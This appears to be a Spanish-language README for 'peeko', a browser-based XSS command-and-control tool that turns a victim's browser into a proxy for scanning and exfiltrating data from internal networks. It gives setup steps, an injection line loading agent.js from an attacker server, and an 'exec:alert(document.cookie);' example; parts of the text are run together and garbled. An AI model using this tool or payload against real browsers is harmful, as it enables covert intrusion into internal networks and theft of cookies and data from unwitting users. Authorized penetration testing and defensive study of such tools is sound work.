
peeko – C2 XSS basado en navegador para exploración sigilosa de redes internas a través de un navegador infectado.
Versión: v1.1
peeko es una herramienta C2 (Comando y Control) impulsada por XSS basada en navegador que aprovecha el navegador de la víctima como un proxy sigiloso dentro de redes internas.
Mediante un payload XSS inyectado, peeko establece una conexión WebSocket a un servidor central, lo que permite a un atacante controlar de forma remota el navegador de la víctima para enviar peticiones a servicios internos, escanear redes, exfiltrar datos o incluso ejecutar JavaScript arbitrario, todo sin soltar un solo binario.
.txt o .jsonClona el repositorio:
git clone https://github.com/b3rito/peeko.git
cd peeko
Instala las dependencias:
make install
(Opcional) Haz ejecutables los scripts:
chmod +x gen-cert.sh start.sh
Genera el certificado TLS autofirmado:
make cert
Reemplaza el marcador SERVER-IP:
Abre y edita los siguientes archivos:
static/agent.jsstatic/control.htmlReemplaza SERVER-IP con la IP/dominio de tu servidor:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
Inicia el servidor:
make run
Abre el panel de control en tu navegador:
https://192.168.30.136:8443/static/control.html
Inyecta el agente (ejemplo XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
192.168.1.0/24, 10.0.0.10-20, etc.80, 443,8000-8080)exec:... para enviarloexec:alert(document.cookie);.txt o .jsonLas políticas de los navegadores modernos afectan a lo que peeko puede acceder.
| Cabecera | ¿Puede leer el contenido? | Notas |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | Acceso completo a la respuesta |
| Sin cabecera | ⚠️ | La respuesta es opaca |
| Origen restringido | ❌ | Bloqueada o ilegible |
La víctima se conecta vía HTTPS. Si un objetivo escaneado solo usa HTTP:
http://Durante una prueba de penetración, si encuentras un servicio interno que responde con Access-Control-Allow-Origin: * y se sirve por HTTPS, entonces peeko se convierte en un proxy sigiloso capaz de exfiltrar datos internos directamente desde el navegador de la víctima, sin soltar archivos ni abrir conexiones salientes.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.
Cualquier uso de peeko fuera de entornos donde tengas permiso explícito está estrictamente prohibido.
Eres responsable de tus propios actos.
Escrito por b3rito en mes3hacklab y GioPpeTto